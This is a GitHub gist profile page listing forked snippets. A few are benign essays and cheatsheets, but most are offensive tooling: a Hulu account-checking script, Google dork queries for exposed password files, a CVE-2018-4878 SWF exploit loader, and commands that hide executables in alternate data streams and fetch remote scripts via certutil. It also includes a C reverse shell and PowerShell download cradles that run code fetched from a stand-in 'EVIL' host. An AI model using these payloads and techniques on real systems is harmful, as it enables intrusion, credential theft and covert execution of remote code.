Skip to content

Instantly share code, notes, and snippets.

View SkyN9ne's full-sized avatar
💚

SkyN9ne SkyN9ne

💚
41 followers · 220 following
View GitHub Profile
@SkyN9ne
SkyN9ne / huluChecker.py
Last active May 21, 2021 01:04 — forked from EmperorRXF/huluChecker.py
HuluChecker
#!/usr/local/bin/python
import os, sys, math, hmac, operator, time, random, urllib2, md5
class AES(object):
# Rijndael S-box
sbox = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67,
0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59,
0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7,
0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1,
@SkyN9ne
SkyN9ne / GoogleDorksList.txt
Last active June 3, 2024 06:25 — forked from cmbaughman/GoogleHackMasterList.txt
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www” domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@SkyN9ne
SkyN9ne / HTTPShame.md
Created May 31, 2021 06:56 — forked from Enegnei/HTTPShame.md
A shame-list of popular websites which have not yet deployed HTTPS certificates

HTTPS vs HTTP

HTTPShame

A shame-list of popular or important websites which have not yet deployed HTTPS certificates by default.

Sites which may involve the transmission of very sensitive data, such as health or banking information, are marked with an ❗ to signal they should deploy HTTPS-by-default as soon as possible. If you are a popular website (such as those on the Alexa Top 500 Global Sites) which finds itself on this list - and you want to be removed - you can visit Let's Encrypt about transitioning to HTTPS. It's easy, free, and will help you learn how to protect your customers/ readers!

List now outdated, removed until further notice.

Q: What is HTTPS?

@SkyN9ne
SkyN9ne / vpn.md
Created July 21, 2021 06:56 — forked from joepie91/vpn.md
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.
@SkyN9ne
SkyN9ne / System Design.md
Created July 21, 2021 06:59 — forked from vasanthk/System Design.md
System Design Cheatsheet

System Design Cheatsheet

Picking the right architecture = Picking the right battles + Managing trade-offs

Basic Steps

  1. Clarify and agree on the scope of the system
  • User cases (description of sequences of events that, taken together, lead to a system doing something useful)
    • Who is going to use it?
    • How are they going to use it?
@SkyN9ne
SkyN9ne / loadswf.as
Created July 27, 2022 19:53 — forked from kbandla/loadswf.as
CVE-2018-4878 ActionScript for pre-decrypted SWF
package
{
import flash.display.Loader;
import flash.display.Sprite;
import flash.events.Event;
import flash.events.IOErrorEvent;
import flash.events.SecurityErrorEvent;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.system.Capabilities;
@SkyN9ne
SkyN9ne / how-to-view-source-of-chrome-extension.md
Created July 30, 2022 14:46 — forked from paulirish/how-to-view-source-of-chrome-extension.md
How to view-source of a Chrome extension

Option 1: Command-line download extension as zip and extract

extension_id=jifpbeccnghkjeaalbbjmodiffmgedin   # change this ID
curl -L -o "$extension_id.zip" "https://clients2.google.com/service/update2/crx?response=redirect&os=mac&arch=x86-64&nacl_arch=x86-64&prod=chromecrx&prodchannel=stable&prodversion=44.0.2403.130&x=id%3D$extension_id%26uc" 
unzip -d "$extension_id-source" "$extension_id.zip"

Thx to crxviewer for the magic download URL.

@SkyN9ne
SkyN9ne / Exe_ADS_Methods.md
Created August 18, 2022 02:55 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@SkyN9ne
SkyN9ne / reverse_shell.c
Created September 4, 2022 02:09 — forked from 0xabe-io/reverse_shell.c
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
@SkyN9ne
SkyN9ne / DownloadCradles.ps1
Created September 11, 2022 23:20 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object